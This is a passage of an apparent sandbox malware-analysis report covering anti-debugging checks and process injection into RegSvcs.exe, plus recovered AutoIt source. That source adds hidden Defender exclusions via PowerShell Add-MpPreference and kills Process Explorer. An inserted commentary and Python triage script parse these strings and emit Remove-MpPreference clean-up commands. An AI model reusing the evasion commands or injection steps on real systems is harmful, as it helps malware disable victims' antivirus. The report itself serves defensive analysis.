                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E8CB7E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F3EB50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F38B42 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F26B40 mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F5AB40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F44B4B mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EBEB20 mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F58B28 mov eax, dword ptr fs:[00000030h] (x2)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F0EB1D mov eax, dword ptr fs:[00000030h] (x9)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00EC2CF0 mov eax, dword ptr fs:[00000030h] (x4)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00E8CCC8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_00F40CB5 mov eax, dword ptr fs:[00000030h] (x4)
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Code function: 0_2_009C2CE0 GetProcessHeap,
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Code function: 0_2_009B6878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Code function: 0_2_009BAAC4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Code function: 0_2_009B6A0B SetUnhandledExceptionFilter,
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exe Code function: 0_2_009B5BBF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc Code function: 10_2_00C829B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc Code function: 10_2_00C70BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc Code function: 10_2_00C70D65 SetUnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc Code function: 10_2_00C70FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00BF29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00BE0BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00BE0D65 SetUnhandledExceptionFilter,
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Code function: 16_2_00BE0FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 696008
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 5CA008
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc Code function: 10_2_00CB1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc Code function: 10_2_00C53312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct")
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: for $objantivirusproduct in $colitems
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $usb = $objantivirusproduct.displayname
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: next
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return $usb
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc ;==>antivirus
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func disabler()
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;if antivirus() = "windows defender" then
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;#requireadmin
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " -command add-mppreference -exclusionpath " & @scriptdir, "", "", @sw_hide)
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'", "", "", @sw_hide)
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbs'", "", "", @sw_hide)
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbe'", "", "", @sw_hide)
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbs'", "", "", @sw_hide)
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbe'", "", "", @sw_hide)
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;endif
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc ;==>disabler
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func antianalysis()
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if winexists("process explorer") then
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: winclose("process explorer")
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("procexp64.exe")
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("procexp.exe")
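The memory strings above are readable AutoIt source for three routines: antivirus() enumerates installed products through the WMI AntiVirusProduct class (the root\SecurityCenter2 class behind the query), disabler() runs PowerShell Add-MpPreference six times to exclude the script directory, regsvcs.exe and the .vbs/.vbe extensions from Defender scanning, and antianalysis() closes Process Explorer. Two details in the strings matter for triage. The "if antivirus() = 'windows defender'" guard and the #requireadmin directive are both commented out with ";", so the exclusions are attempted unconditionally; since Add-MpPreference needs an elevated token, they fail silently under @sw_hide when the sample runs unelevated, and succeed only if the victim launched it as administrator. The duplicated '.vbs'/'*.vbs' pairs suggest the author was hedging on the accepted syntax. The Python below is an added example, not part of the report or the sample: it parses AutoIt text in the layout seen above (the SCRIPT text is constructed from those strings, and the "func antivirus()" header is assumed since the report shows only that function's body), records the defence-evasion actions, and emits the Remove-MpPreference commands an incident responder would run, elevated, to undo the exclusions.

```python
"""Triage the recovered AutoIt defence-evasion routine and emit Defender clean-up.

Added example. SCRIPT is constructed from the memory strings in the report
(the 'func antivirus()' header is assumed; the report shows only its body).
The regexes assume the AutoIt source layout seen in those strings.
"""
import re

SCRIPT = r'''
func antivirus()
$colitems = $owmi.execquery("select * from antivirusproduct")
for $objantivirusproduct in $colitems
$usb = $objantivirusproduct.displayname
next
return $usb
endfunc ;==>antivirus
func disabler()
;if antivirus() = "windows defender" then
;#requireadmin
shellexecute("powershell", " -command add-mppreference -exclusionpath " & @scriptdir, "", "", @sw_hide)
shellexecute("powershell", " powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'", "", "", @sw_hide)
shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbs'", "", "", @sw_hide)
shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbe'", "", "", @sw_hide)
shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbs'", "", "", @sw_hide)
shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbe'", "", "", @sw_hide)
;endif
endfunc ;==>disabler
func antianalysis()
if winexists("process explorer") then
winclose("process explorer")
processclose("procexp64.exe")
processclose("procexp.exe")
'''

# shellexecute("powershell", "<args>" [& @macro], ...): capture args and any
# concatenated AutoIt macro such as @scriptdir.
EXEC_RE = re.compile(
    r'shellexecute\("powershell",\s*"(?P<args>[^"]*)"(?:\s*&\s*(?P<macro>@\w+))?', re.I)
EXCL_RE = re.compile(
    r"add-mppreference\s+-exclusion(?P<kind>path|process|extension)\s*"
    r"(?P<val>'[^']*'|\S+)?", re.I)
KILL_RE = re.compile(r'processclose\("([^"]+)"\)', re.I)
WIN_RE = re.compile(r'winclose\("([^"]+)"\)', re.I)
WMI_RE = re.compile(r'execquery\("select \* from antivirusproduct"\)', re.I)


def triage(script):
    """Extract AV enumeration, Defender exclusions, killed tools and dead guards."""
    f = {"av_enumeration": False, "defender_exclusions": [],
         "killed_processes": [], "closed_windows": [], "disabled_guards": []}
    for raw in script.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith(";"):          # AutoIt comment: this guard never runs
            f["disabled_guards"].append(line)
            continue
        if WMI_RE.search(line):
            f["av_enumeration"] = True    # WMI AntiVirusProduct (root\SecurityCenter2)
            continue
        m = EXEC_RE.search(line)
        if m:
            e = EXCL_RE.search(m["args"])
            if e:
                value = e["val"].strip("'") if e["val"] else m["macro"]
                f["defender_exclusions"].append((e["kind"].lower(), value))
            continue
        m = KILL_RE.search(line)
        if m:
            f["killed_processes"].append(m.group(1))
            continue
        m = WIN_RE.search(line)
        if m:
            f["closed_windows"].append(m.group(1))
    return f


def remediation(findings):
    """PowerShell lines (run elevated) that undo each recorded exclusion."""
    cmds = []
    for kind, value in findings["defender_exclusions"]:
        param = "Exclusion" + kind.capitalize()   # ExclusionPath/-Process/-Extension
        if value.startswith("@"):
            # Unresolved AutoIt macro: read the live value instead of guessing a path.
            cmds.append(f"# {param}: value was AutoIt macro {value}; "
                        f"inspect with (Get-MpPreference).{param}")
        else:
            cmds.append(f"Remove-MpPreference -{param} '{value}'")
    return cmds


if __name__ == "__main__":
    found = triage(SCRIPT)
    for key, val in found.items():
        print(f"{key}: {val}")
    print("\n".join(remediation(found)))
```

Because the script only enumerates AV products and never acts on the result, the av_enumeration flag is informational; the exclusions list is what drives clean-up, and the disabled_guards list is how you document that the elevation requirement was stripped by the author rather than satisfied at runtime.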
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: /c:\x1ew
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: users
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: usersd
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fusers@shell32.dll,-21813
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: user~1
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: user~1d
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: frontdesk
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: appdata
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: appdata@
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3*nappdata
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local<
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _:+local
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: temp:
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: /temp
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pr}tr}t
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: q}tpq}t`q}tpq}t<q}t
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: p}tpd98
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ho}txo}tdo}t$o}t
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: xl}tho}txo}tdo}t$o}t
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: n}txn}tdn}thn}t4n}t$n}t
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: m}tlm}t\m}tlm}t8m}t(m}t
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: l}tpl}t
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gfv hzumemstr_f2b08dcc-4
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y\machin$memstr_5d83d83f-3
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell:::{20d04fe0-3aea-1069-a2d8-08002b30309d}\::{d3162b92-9365-467a-956b-92703aca08af}#memstr_2ae768b3-e
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ontdeskmemstr_1a503fb0-2
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ontdeskdmemstr_298d6930-b
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .usermemstr_5cc2135d-5
                Source: uhbrQkYNzx.exe, 00000000.00000003.1486664685.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ^c:\users\user\favorites\links\desktop.ini1memstr_3672340c-1
                Source: uhbrQkYNzx.exe, 00000000.00000002.1506416143.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tc:\users\user\desktop\uhbrqkynzx.exememstr_4aca3c72-d
                Source: uhbrQkYNzx.exe, 00000000.00000002.1506416143.0000000006AE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: richedit20wmemstr_7942cc6e-3
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ocswnmemstr_52334e7f-5
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ocswn memstr_b719d365-2
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: rhjhuow,memstr_8e3610fc-6
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: pi-ms-win-core-localization-private-l1-1-0.dlldmemstr_bc395536-a
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\kernelbase.dllmemstr_4a95d37d-2
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: swg@@memstr_7b63d182-a
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: rhjhuowmemstr_6be1b9bc-4
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: pi-ms-win-core-apiquery-l1-1-0.dllll@ memstr_f525f827-a
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\ntdll.dll.dllmemstr_32f412bf-0
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: pi-ms-win-core-apiquery-l1-1-0.dll0.dllllmemstr_1ee17c28-e
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: pi-ms-win-core-apiquery-l1-1-0.dllmemstr_a5b7234f-3
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: c:\windows\system3memstr_87d43f47-c
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: 0#'memstr_7f6c98d8-5
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ocswbmemstr_eab10460-e
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ocswb memstr_683b7ace-6
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: dl*llmemstr_7db3902d-b
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: tem32\kernel32.dlllmemstr_5f6a733b-3
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: pi-ms-win-core-processthreads-l1-1-0l memstr_f054a47c-5
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: c:\windows\syswow64'memstr_f5c26b13-2
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: c:\wdmemstr_47715aff-b
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\kernelbase.dllmemstr_b309ff8d-6
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: c:\windows\syswow64memstr_5bf6dc06-d
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: owow@memstr_1ce38e4f-f
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: [erwtmemstr_a8cab7a2-2
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: crwx&'memstr_ca5e925f-f
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: qrwh$'memstr_c59e2f7a-4
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: -nrwtmemstr_3942d004-5
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: gvw`\rwmemstr_7c4b3f8d-9
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: yrwh$'memstr_6899ed65-b
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: (h$'memstr_d1926951-9
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505528379.000000000318D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ^{uwh$'memstr_d71d82da-9
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ocsw'memstr_6f63f14c-f
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ocsw' xmemstr_973711f9-1
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: i=9o'memstr_14b2e595-8
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: 8o(#@omemstr_0c654af4-f
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: &*=omemstr_b4112dd5-e
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: 7=o\3vwmemstr_ac658226-6
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: =o3u!memstr_d188f7e0-7
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: $4?o(4?o8memstr_9039a758-c
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: d$4?o(4?o8memstr_5404c2bd-4
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: m=ogv!memstr_9e41a49f-2
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: snsw@memstr_2c4a0b36-e
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: |:o`m(memstr_404e2df8-c
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: d{wwxmemstr_295b6d89-9
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: t=(o0\)omemstr_fd4c1480-2
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: t=(o0\)osnswmemstr_92d35d92-4
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: qswammemstr_160c6a7d-5
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: qswimmemstr_575d3420-f
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: snsw memstr_78a090db-1
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: 0a(oda(omemstr_fdd19bf1-e
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: 0a(oxmemstr_d70f1278-e
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: m(oxn(o|memstr_58bcd3a4-e
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: rrsw;memstr_3b952c98-e
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: d{ww memstr_d09b6071-b
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: <sw)4`xmemstr_f60675c5-4
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: osw@hmemstr_5e573096-1
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ^sw@@memstr_71aeb335-6
                Source: uhbrQkYNzx.exe, 00000000.00000002.1505368809.0000000002EF0000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: l4=oxmemstr_ce44eb23-9
